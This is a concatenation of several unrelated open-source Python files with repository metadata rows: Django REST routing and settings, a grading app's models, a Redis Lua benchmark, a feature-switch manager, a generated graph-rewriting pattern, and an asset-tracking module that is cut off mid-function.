"""
pass
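# Usage sketch (hypothetical host, assuming DRF TokenAuthentication as linked above):
# the token from /api/me replaces the session cookie when calling the API directly.
#
#   import requests
#   requests.get("https://dochub.example/api/documents/",
#                headers={"Authorization": "Token <token-from-/api/me>"})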
class Router(DefaultRouter):
APIRootView = DochubAPI
router = Router()
router.register(r'users', users.rest.UserViewSet)
router.register(r'courses', catalog.rest.CourseViewSet)
router.register(r'categories', catalog.rest.CategoryViewSet)
router.register(r'threads', telepathy.rest.ThreadViewSet)
router.register(r'messages', telepathy.rest.MessageViewSet)
router.register(r'documents', documents.rest.DocumentViewSet)
router.register(r'search/courses', search.rest.CourseSearchViewSet, basename="search-courses")
router.register(r'feed', www.rest.FeedViewSet, basename="feed")
router.register(r'me', users.rest.Me, basename="users-me")
router.register(r'notifications', notifications.rest.NotificationsViewSet, basename="notifications")
router.register(r'me/actions', www.rest.SelfFeedViewSet, basename="user-actions")
router.register(r'tree', catalog.rest.Tree, basename="catalog-tree")
urlpatterns = router.urls
| agpl-3.0 | 402,545,330,675,040,000 | 34.807692 | 100 | 0.762084 | false |
pombredanne/django-bulbs | example/settings.py | 1 | 2779 | import os
MODULE_ROOT = os.path.dirname(os.path.realpath(__file__))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:'
}
}
USE_TZ = True
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
TEMPLATE_DIRS = (os.path.join(MODULE_ROOT, 'templates'),)
INSTALLED_APPS = (
# django modules
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
# third parties
"djbetty",
"djes",
"rest_framework",
"polymorphic",
# local apps
"bulbs.api",
"bulbs.campaigns",
"bulbs.feeds",
"bulbs.redirects",
"bulbs.cms_notifications",
"bulbs.content",
"bulbs.contributions",
"bulbs.promotion",
"bulbs.special_coverage",
"bulbs.sections",
# local testing apps
"example.testcontent",
)
ROOT_URLCONF = "example.urls"
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
"django.core.context_processors.request"
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'bulbs.promotion.middleware.PromotionMiddleware'
)
CELERY_ALWAYS_EAGER = True
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.SessionAuthentication',
)
}
SECRET_KEY = "no-op"
ES_DISABLED = False
ES_URLS = ['http://localhost:9200']
ES_INDEX = "django-bulbs"
ES_INDEX_SETTINGS = {
"django-bulbs": {
"index": {
"analysis": {
"filter": {
"autocomplete_filter": {
"type": "edge_ngram",
"min_gram": 1,
"max_gram": 20
}
},
"analyzer": {
"autocomplete": {
"type": "custom",
"tokenizer": "standard",
"filter": [
"lowercase",
"autocomplete_filter"
]
}
}
}
}
}
}
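# Example of the "autocomplete" analyzer above (illustrative): at index time "Django"
# is lowercased and edge-ngrammed with min_gram=1 / max_gram=20 into the tokens
# "d", "dj", "dja", "djan", "djang", "django", which is what lets prefix queries match.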
| mit | 1,383,098,583,233,259,800 | 24.263636 | 65 | 0.56783 | false |
pombredanne/discern | examples/problem_grader/grader/models.py | 1 | 5156 | from django.db import models
from django.contrib.auth.models import User
from django.forms.models import model_to_dict
from django.db.models.signals import post_save, pre_save
import random
import string
from django.conf import settings
import requests
import json
import logging
log= logging.getLogger(__name__)
class Rubric(models.Model):
"""
The rubric object is a way to locally store data about rubric options.
Each rubric is associated with a problem object stored on the API side.
"""
#Each rubric is specific to a problem and a user.
associated_problem = models.IntegerField()
user = models.ForeignKey(User)
created = models.DateTimeField(auto_now_add=True)
modified = models.DateTimeField(auto_now=True)
def get_scores(self):
"""
Calculate the final score for a given rubric.
"""
scores = []
all_scores = []
final_score=0
max_score = 0
options = self.get_rubric_dict()
for option in options:
#Add to all_scores for each of the scores
all_scores.append(option['option_points'])
#If the student was marked as correct for a given option, add it to the score
if option['selected']:
scores.append(option['option_points'])
if len(scores)>0:
final_score = sum(scores)
if len(all_scores)>0:
max_score = sum(all_scores)
return {
'score' : final_score,
'max_score' : max_score
}
def get_rubric_dict(self):
"""
Get the rubric in dictionary form.
"""
options = []
#Bundle up all of the rubric options
option_set = self.rubricoption_set.all().order_by('id')
for option in option_set:
options.append(model_to_dict(option))
return options
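# Worked example (hypothetical data) for get_scores(): with two options worth 2 and 3
# points where only the first is selected, the result is {'score': 2, 'max_score': 5}.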
class RubricOption(models.Model):
"""
Each rubric has multiple options
"""
#Associate options with rubrics
rubric = models.ForeignKey(Rubric)
#Number of points the rubric option is worth
option_points = models.IntegerField()
#Text to show to users for this option
option_text = models.TextField()
#Whether or not this option is selected (ie marked correct)
selected = models.BooleanField(default=False)
class UserProfile(models.Model):
"""
Every user has a profile. Used to store additional fields.
"""
user = models.OneToOneField(User)
#Api key
api_key = models.TextField(default="")
#Api username
api_user = models.TextField(default="")
#whether or not an api user has been created
api_user_created = models.BooleanField(default=False)
def get_api_auth(self):
"""
Returns the api authentication dictionary for the given user
"""
return {
'username' : self.api_user,
'api_key' : self.api_key
}
def create_user_profile(sender, instance, created, **kwargs):
"""
Creates a user profile based on a signal from User when it is created
"""
#Create a userprofile if the user has just been created, don't if not.
if created:
profile, created = UserProfile.objects.get_or_create(user=instance)
else:
return
#If a userprofile was not created (gotten instead), then don't make an api user
if not created:
return
#Create a random password for the api user
random_pass = ''.join([random.choice(string.digits + string.letters) for i in range(0, 15)])
#Data we will post to the api to make a user
data = {
'username' : instance.username,
'password' : random_pass,
'email' : instance.email
}
headers = {'content-type': 'application/json'}
#Now, let's try to get the schema for the create user model.
create_user_url = settings.FULL_API_START + "createuser/"
counter = 0
status_code = 400
#Try to create the user at the api
while status_code==400 and counter<2 and not instance.profile.api_user_created:
try:
#Post our information to try to create a user
response = requests.post(create_user_url, data=json.dumps(data),headers=headers)
status_code = response.status_code
#If a user has been created, store the api key locally
if status_code==201:
instance.profile.api_user_created = True
response_data = json.loads(response.content)
instance.profile.api_key = response_data['api_key']
instance.profile.api_user = data['username']
instance.profile.save()
except:
log.exception("Could not create an API user!")
instance.profile.save()
counter+=1
#If we could not create a user in the first pass through the loop, add to the username to try to make it unique
data['username'] += random.choice(string.digits + string.letters)
post_save.connect(create_user_profile, sender=User)
#Maps the get_profile() function of a user to an attribute profile
User.profile = property(lambda u: u.get_profile())
| agpl-3.0 | 7,535,211,253,820,330,000 | 32.480519 | 119 | 0.632661 | false |
mabotech/mabo.io | py/AK/test/redis_lua000.py | 1 | 1801 | # -*- coding: utf-8 -*-
"""
redis lua
redis eval, notify in lua script
"""
import time
import redis
def main(key, val, key2, val2):
# connection pool
r = redis.Redis(host='localhost', port=6379, db=5)
d = {"a":"v1"}
"""
eval("lua script","number of kkeys", keys[],argv[])
KEYS[1]
ARGV[1]
compare the new value with the stored one
update the stored value only when it changes
create a job to update the db when the value changes
set a heartbeat per tag
"""
lua_code = """if redis.call("EXISTS", KEYS[1]) == 1 then
-- redis.call("SET", "ST", ARGV[3])
-- redis.call("LPUSH", "c1","chan1")
-- redis.call("PUBLISH", "c1","new")
--
local payload = redis.call("GET", KEYS[1])
if payload == ARGV[1] then
return "same"
else
redis.call("SET", KEYS[1],ARGV[1])
redis.call("SET", KEYS[2],ARGV[2])
redis.call("LPUSH", "c1","chan2")
return payload -- return old val
end
else
redis.call("SET", KEYS[1],ARGV[1])
redis.call("SET", KEYS[2],ARGV[2])
redis.call("LPUSH", "c1","chan2")
return nil
end"""
#.format(**d)
#print(lua_code)
#benchmark
"""
0.22 ms
4545 times/second
"""
t1 = time.time()
stamp = t1*1000
val2 = t1*1000
n = 1
for i in xrange(0, n):
v = r.eval(lua_code, 2, key, key2, val, val2, stamp)
t2 = time.time()
t = (t2-t1)*1000/n
print("%sms" %(t))
#print(1000/t)
print(v)
h = r.script_load(lua_code)
print h
#print dir(r)
if __name__ == "__main__":
key = "y:a:c"
val = "10.20"
key2 = "y:a:c_st"
val2 = time.time()
main(key, val, key2, val2) | mit | -3,571,517,743,080,625,000 | 17.770833 | 61 | 0.481954 | false |
switchboardpy/switchboard | switchboard/manager.py | 1 | 7753 | """
switchboard.manager
~~~~~~~~~~~~~~~~
:copyright: (c) 2015 Kyle Adams.
:license: Apache License 2.0, see LICENSE for more details.
"""
import logging
from .base import ModelDict
from .models import (
Switch,
DISABLED, SELECTIVE, GLOBAL, INHERIT,
INCLUDE, EXCLUDE,
)
from .proxy import SwitchProxy
from .settings import settings, Settings
log = logging.getLogger(__name__)
# These are (mostly) read-only module variables since we want it shared among
# any and all threads. The only exception to read-only is when they are
# populated on Switchboard startup (i.e., operator.register()).
registry = {}
registry_by_namespace = {}
def nested_config(config):
cfg = {}
token = 'switchboard.'
for k, v in config.iteritems():
if k.startswith(token):
cfg[k.replace(token, '')] = v
return cfg
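# Example (illustrative): nested_config({'switchboard.mongo_host': 'db', 'debug': True})
# returns {'mongo_host': 'db'} - only the 'switchboard.'-prefixed keys survive, unprefixed.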
def configure(config={}, datastore=None, nested=False):
"""
Useful for when you need to control Switchboard's setup
"""
if nested:
config = nested_config(config)
# Re-read settings to make sure we have everything.
# XXX It would be really nice if we didn't need to do this.
Settings.init(**config)
if datastore:
Switch.ds = datastore
# Register the builtins
__import__('switchboard.builtins')
class SwitchManager(ModelDict):
DISABLED = DISABLED
SELECTIVE = SELECTIVE
GLOBAL = GLOBAL
INHERIT = INHERIT
INCLUDE = INCLUDE
EXCLUDE = EXCLUDE
def __init__(self, *args, **kwargs):
# Inject args and kwargs that are known quantities; the SwitchManager
# will always deal with the Switch model and so on.
new_args = [Switch]
for a in args:
new_args.append(a)
kwargs['key'] = 'key'
kwargs['value'] = 'value'
self.result_cache = None
self.context = {}
super(SwitchManager, self).__init__(*new_args, **kwargs)
def __unicode__(self): # pragma: nocover
return "<%s: %s (%s)>" % (self.__class__.__name__,
getattr(self, 'model', ''),
registry.values())
def __getitem__(self, key):
"""
Returns a SwitchProxy, rather than a Switch. It allows us to
easily extend the Switches method and automatically include our
manager instance.
"""
return SwitchProxy(self, super(SwitchManager, self).__getitem__(key))
def with_result_cache(func):
"""
Decorator specifically for is_active. If self.result_cache is set to a {}
the is_active results will be cached for each set of params.
"""
def inner(self, *args, **kwargs):
dic = self.result_cache
cache_key = None
if dic is not None:
cache_key = (args, tuple(sorted(kwargs.items())))
try:
result = dic.get(cache_key)
except TypeError as e: # not hashable
log.debug('Switchboard result cache not active for this "%s" check due to: %s within args: %s',
args[0], e, repr(cache_key)[:200])
cache_key = None
else:
if result is not None:
return result
result = func(self, *args, **kwargs)
if cache_key is not None:
dic[cache_key] = result
return result
return inner
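# Usage sketch (assuming the caller owns the cache lifetime, e.g. one dict per request):
#   operator.result_cache = {}        # turn caching on
#   operator.is_active('my_feature')  # computed and stored
#   operator.is_active('my_feature')  # served from result_cache
#   operator.result_cache = None      # turn caching off again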
@with_result_cache
def is_active(self, key, *instances, **kwargs):
"""
Returns ``True`` if any of ``instances`` match an active switch.
Otherwise returns ``False``.
>>> operator.is_active('my_feature', request) #doctest: +SKIP
"""
try:
default = kwargs.pop('default', False)
# Check all parents for a disabled state
parts = key.split(':')
if len(parts) > 1:
child_kwargs = kwargs.copy()
child_kwargs['default'] = None
result = self.is_active(':'.join(parts[:-1]), *instances,
**child_kwargs)
if result is False:
return result
elif result is True:
default = result
try:
switch = self[key]
except KeyError:
# switch is not defined, defer to parent
return default
if switch.status == GLOBAL:
return True
elif switch.status == DISABLED:
return False
elif switch.status == INHERIT:
return default
conditions = switch.value
# If no conditions are set, we inherit from parents
if not conditions:
return default
instances = list(instances) if instances else []
instances.extend(self.context.values())
# check each switch to see if it can execute
return_value = False
for namespace, condition in conditions.iteritems():
condition_set = registry_by_namespace.get(namespace)
if not condition_set:
continue
result = condition_set.has_active_condition(condition,
instances)
if result is False:
return False
elif result is True:
return_value = True
except:
log.exception('Error checking if switch "%s" is active', key)
return_value = False
# there were no matching conditions, so it must not be enabled
return return_value
def register(self, condition_set):
"""
Registers a condition set with the manager.
>>> condition_set = MyConditionSet() #doctest: +SKIP
>>> operator.register(condition_set) #doctest: +SKIP
"""
if callable(condition_set):
condition_set = condition_set()
registry[condition_set.get_id()] = condition_set
registry_by_namespace[condition_set.get_namespace()] = condition_set
def unregister(self, condition_set):
"""
Unregisters a condition set with the manager.
>>> operator.unregister(condition_set) #doctest: +SKIP
"""
if callable(condition_set):
condition_set = condition_set()
registry.pop(condition_set.get_id(), None)
registry_by_namespace.pop(condition_set.get_namespace(), None)
def get_condition_set_by_id(self, switch_id):
"""
Given the identifier of a condition set (described in
ConditionSet.get_id()), returns the registered instance.
"""
return registry[switch_id]
def get_condition_sets(self):
"""
Returns a generator yielding all currently registered
ConditionSet instances.
"""
return registry.itervalues()
def get_all_conditions(self):
"""
Returns a generator which yields groups of lists of conditions.
>>> for set_id, label, field in operator.get_all_conditions(): #doctest: +SKIP
>>> print "%(label)s: %(field)s" % (label, field.label) #doctest: +SKIP
"""
cs = self.get_condition_sets()
for condition_set in sorted(cs, key=lambda x: x.get_group_label()):
group = unicode(condition_set.get_group_label())
for field in condition_set.fields.itervalues():
yield condition_set.get_id(), group, field
auto_create = getattr(settings, 'SWITCHBOARD_AUTO_CREATE', True)
operator = SwitchManager(auto_create=auto_create)
| apache-2.0 | -1,019,915,879,707,345,900 | 32.562771 | 115 | 0.559267 | false |
levilucio/SyVOLT | t_core/HTopClass2TableNAC0.py | 1 | 8862 |
from core.himesis import Himesis, HimesisPreConditionPatternNAC
import cPickle as pickle
from uuid import UUID
class HTopClass2TableNAC0(HimesisPreConditionPatternNAC):
def __init__(self, LHS):
"""
Creates the himesis graph representing the AToM3 model HTopClass2TableNAC0.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HTopClass2TableNAC0, self).__init__(name='HTopClass2TableNAC0', num_nodes=3, edges=[], LHS=LHS)
# Add the edges
self.add_edges([(1, 0), (0, 2)])
# Set the graph attributes
self["mm__"] = pickle.loads("""(lp1
S'MT_pre__CD2RDBMSMetaModel'
p2
aS'MoTifRule'
p3
a.""")
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the NAC have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True forbids the rule from being applied,
# returning False enables the rule to be applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = UUID('d74c9eae-e470-4aa6-8817-2e15a1b64aab')
# Set the node attributes
self.vs[0]["MT_subtypeMatching__"] = False
self.vs[0]["MT_label__"] = """3"""
self.vs[0]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[0]["mm__"] = """MT_pre__Parent"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["GUID__"] = UUID('94914a38-3999-44e8-8ecc-1e356a6b3e23')
self.vs[1]["MT_subtypeMatching__"] = False
self.vs[1]["MT_pre__is_persistent"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """1"""
self.vs[1]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[1]["mm__"] = """MT_pre__Clazz"""
self.vs[1]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["GUID__"] = UUID('a2616a97-3c66-4aa2-928f-52a37b14147b')
self.vs[2]["MT_subtypeMatching__"] = False
self.vs[2]["MT_pre__is_persistent"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """2"""
self.vs[2]["MT_subtypes__"] = pickle.loads("""(lp1
.""")
self.vs[2]["mm__"] = """MT_pre__Clazz"""
self.vs[2]["MT_pre__name"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["GUID__"] = UUID('4a053f4e-83f0-474b-af5a-6e2e58e5ea12')
# Load the bridge between this NAC and its LHS
from HTopClass2TableNAC0Bridge import HTopClass2TableNAC0Bridge
self.bridge = HTopClass2TableNAC0Bridge()
def eval_is_persistent1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_is_persistent2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes, use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the NAC have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True forbids the rule from being applied,
# returning False enables the rule to be applied.
#===============================================================================
return True
| mit | 731,728,089,143,411,300 | 47.233333 | 117 | 0.51072 | false |
Paytokens/payblockd | lib/components/assets.py | 1 | 14549 | import os
import logging
import decimal
import base64
import json
from datetime import datetime
from lib import config, util, util_litecoin
ASSET_MAX_RETRY = 3
D = decimal.Decimal
def parse_issuance(db, message, cur_block_index, cur_block):
if message['status'] != 'valid':
return
def modify_extended_asset_info(asset, description):
"""adds an asset to asset_extended_info collection if the description is a valid json link. or, if the link
is not a valid json link, will remove the asset entry from the table if it exists"""
if util.is_valid_url(description, suffix='.json', allow_no_protocol=True):
db.asset_extended_info.update({'asset': asset},
{'$set': {
'info_url': description,
'info_status': 'needfetch',
'fetch_info_retry': 0, # retry ASSET_MAX_RETRY times to fetch info from info_url
'info_data': {},
'errors': []
}}, upsert=True)
#^ valid info_status settings: needfetch, valid, invalid, error
#additional fields will be added later in events, once the asset info is pulled
else:
db.asset_extended_info.remove({ 'asset': asset })
#remove any saved asset image data
imagePath = os.path.join(config.DATA_DIR, config.SUBDIR_ASSET_IMAGES, asset + '.png')
if os.path.exists(imagePath):
os.remove(imagePath)
tracked_asset = db.tracked_assets.find_one(
{'asset': message['asset']}, {'_id': 0, '_history': 0})
#^ pulls the tracked asset without the _id and history fields. This may be None
if message['locked']: #lock asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'locked',
'locked': True,
},
"$push": {'_history': tracked_asset } }, upsert=False)
logging.info("Locking asset %s" % (message['asset'],))
elif message['transfer']: #transfer asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'transferred',
'owner': message['issuer'],
},
"$push": {'_history': tracked_asset } }, upsert=False)
logging.info("Transferring asset %s to address %s" % (message['asset'], message['issuer']))
elif message['quantity'] == 0 and tracked_asset is not None: #change description
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'changed_description',
'description': message['description'],
},
"$push": {'_history': tracked_asset } }, upsert=False)
modify_extended_asset_info(message['asset'], message['description'])
logging.info("Changing description for asset %s to '%s'" % (message['asset'], message['description']))
else: #issue new asset or issue addition qty of an asset
if not tracked_asset: #new issuance
tracked_asset = {
'_change_type': 'created',
'_at_block': cur_block_index, #the block ID this asset is current for
'_at_block_time': cur_block['block_time_obj'],
#^ NOTE: if there are multiple tracked-asset change updates in a single block for the
# same asset, the last one with _at_block == that block id in the history array is
# the final version for that asset at that block
'asset': message['asset'],
'owner': message['issuer'],
'description': message['description'],
'divisible': message['divisible'],
'locked': False,
'total_issued': message['quantity'],
'total_issued_normalized': util_litecoin.normalize_quantity(message['quantity'], message['divisible']),
'_history': [] #to allow for block rollbacks
}
db.tracked_assets.insert(tracked_asset)
logging.info("Tracking new asset: %s" % message['asset'])
modify_extended_asset_info(message['asset'], message['description'])
else: #issuing additional of existing asset
assert tracked_asset is not None
db.tracked_assets.update(
{'asset': message['asset']},
{"$set": {
'_at_block': cur_block_index,
'_at_block_time': cur_block['block_time_obj'],
'_change_type': 'issued_more',
},
"$inc": {
'total_issued': message['quantity'],
'total_issued_normalized': util_litecoin.normalize_quantity(message['quantity'], message['divisible'])
},
"$push": {'_history': tracked_asset} }, upsert=False)
logging.info("Adding additional %s quantity for asset %s" % (
util_litecoin.normalize_quantity(message['quantity'], message['divisible']), message['asset']))
return True
def inc_fetch_retry(db, asset, max_retry=ASSET_MAX_RETRY, new_status='error', errors=[]):
asset['fetch_info_retry'] += 1
asset['errors'] = errors
if asset['fetch_info_retry'] == max_retry:
asset['info_status'] = new_status
db.asset_extended_info.save(asset)
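# Illustrative behaviour of inc_fetch_retry(): with ASSET_MAX_RETRY = 3, the first two
# failed fetches only bump fetch_info_retry; the third flips info_status to new_status
# ('error' by default, or 'invalid' when validation failed) and records the errors.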
def sanitize_json_data(data):
data['asset'] = util.sanitize_eliteness(data['asset'])
if 'description' in data: data['description'] = util.sanitize_eliteness(data['description'])
if 'website' in data: data['website'] = util.sanitize_eliteness(data['website'])
if 'pgpsig' in data: data['pgpsig'] = util.sanitize_eliteness(data['pgpsig'])
return data
def process_asset_info(db, asset, info_data):
# sanity check
assert asset['info_status'] == 'needfetch'
assert 'info_url' in asset
assert util.is_valid_url(asset['info_url'], allow_no_protocol=True) #already validated in the fetch
errors = util.is_valid_json(info_data, config.ASSET_SCHEMA)
if not isinstance(info_data, dict) or 'asset' not in info_data:
errors.append('Invalid data format')
elif asset['asset'] != info_data['asset']:
errors.append('asset field does not match asset name')
if len(errors) > 0:
inc_fetch_retry(db, asset, new_status='invalid', errors=errors)
return (False, errors)
asset['info_status'] = 'valid'
#fetch any associated images...
    #TODO: parallelize this 2nd level asset image fetching ... (e.g. just compose a list here, and process it later on)
if 'image' in info_data:
info_data['valid_image'] = util.fetch_image(info_data['image'],
config.SUBDIR_ASSET_IMAGES, asset['asset'], fetch_timeout=5)
asset['info_data'] = sanitize_json_data(info_data)
db.asset_extended_info.save(asset)
return (True, None)
def fetch_all_asset_info(db):
assets = list(db.asset_extended_info.find({'info_status': 'needfetch'}))
asset_info_urls = []
def asset_fetch_complete_hook(urls_data):
logging.info("Enhanced asset info fetching complete. %s unique URLs fetched. Processing..." % len(urls_data))
for asset in assets:
logging.debug("Looking at asset %s: %s" % (asset, asset['info_url']))
if asset['info_url']:
info_url = ('http://' + asset['info_url']) \
if not asset['info_url'].startswith('http://') and not asset['info_url'].startswith('https://') else asset['info_url']
assert info_url in urls_data
if not urls_data[info_url][0]: #request was not successful
inc_fetch_retry(db, asset, max_retry=ASSET_MAX_RETRY, errors=[urls_data[info_url][1]])
logging.warn("Fetch for asset at %s not successful: %s (try %i of %i)" % (
info_url, urls_data[info_url][1], asset['fetch_info_retry'], ASSET_MAX_RETRY))
else:
result = process_asset_info(db, asset, urls_data[info_url][1])
if not result[0]:
logging.info("Processing for asset %s at %s not successful: %s" % (asset['asset'], info_url, result[1]))
else:
logging.info("Processing for asset %s at %s successful" % (asset['asset'], info_url))
#compose and fetch all info URLs in all assets with them
for asset in assets:
if not asset['info_url']: continue
if asset.get('disabled', False):
logging.info("ExtendedAssetInfo: Skipping disabled asset %s" % asset['asset'])
continue
#may or may not end with .json. may or may not start with http:// or https://
asset_info_urls.append(('http://' + asset['info_url']) \
if not asset['info_url'].startswith('http://') and not asset['info_url'].startswith('https://') else asset['info_url'])
asset_info_urls_str = ', '.join(asset_info_urls)
asset_info_urls_str = (asset_info_urls_str[:2000] + ' ...') if len(asset_info_urls_str) > 2000 else asset_info_urls_str #truncate if necessary
if len(asset_info_urls):
logging.info('Fetching enhanced asset info for %i assets: %s' % (len(asset_info_urls), asset_info_urls_str))
util.stream_fetch(asset_info_urls, asset_fetch_complete_hook,
fetch_timeout=10, max_fetch_size=4*1024, urls_group_size=20, urls_group_time_spacing=20,
per_request_complete_callback=lambda url, data: logging.debug("Asset info URL %s retrieved, result: %s" % (url, data)))
def get_escrowed_balances(addresses):
addresses_holder = ','.join(['?' for e in range(0,len(addresses))])
sql ='''SELECT (source || '_' || give_asset) AS source_asset, source AS address, give_asset AS asset, SUM(give_remaining) AS quantity
FROM orders
WHERE source IN ({}) AND status = ? AND give_asset != ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['open', 'LTC']
results = util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT (tx0_address || '_' || forward_asset) AS source_asset, tx0_address AS address, forward_asset AS asset, SUM(forward_quantity) AS quantity
FROM order_matches
WHERE tx0_address IN ({}) AND forward_asset != ? AND status = ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['LTC', 'pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT (tx1_address || '_' || backward_asset) AS source_asset, tx1_address AS address, backward_asset AS asset, SUM(backward_quantity) AS quantity
FROM order_matches
WHERE tx1_address IN ({}) AND backward_asset != ? AND status = ?
GROUP BY source_asset'''.format(addresses_holder)
bindings = addresses + ['LTC', 'pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT source AS address, '{}' AS asset, SUM(wager_remaining) AS quantity
FROM bets
WHERE source IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['open']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx0_address AS address, '{}' AS asset, SUM(forward_quantity) AS quantity
FROM bet_matches
WHERE tx0_address IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx1_address AS address, '{}' AS asset, SUM(backward_quantity) AS quantity
FROM bet_matches
WHERE tx1_address IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT source AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps
WHERE source IN ({}) AND status = ?
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['open']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx0_address AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps_matches
WHERE tx0_address IN ({}) AND status IN (?, ?, ?)
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending', 'pending and resolved', 'resolved and pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
sql = '''SELECT tx1_address AS address, '{}' AS asset, SUM(wager) AS quantity
FROM rps_matches
WHERE tx1_address IN ({}) AND status IN (?, ?, ?)
GROUP BY address'''.format(config.XPT, addresses_holder)
bindings = addresses + ['pending', 'pending and resolved', 'resolved and pending']
results += util.call_jsonrpc_api("sql", {'query': sql, 'bindings': bindings}, abort_on_error=True)['result']
escrowed_balances = {}
for order in results:
if order['address'] not in escrowed_balances:
escrowed_balances[order['address']] = {}
if order['asset'] not in escrowed_balances[order['address']]:
escrowed_balances[order['address']][order['asset']] = 0
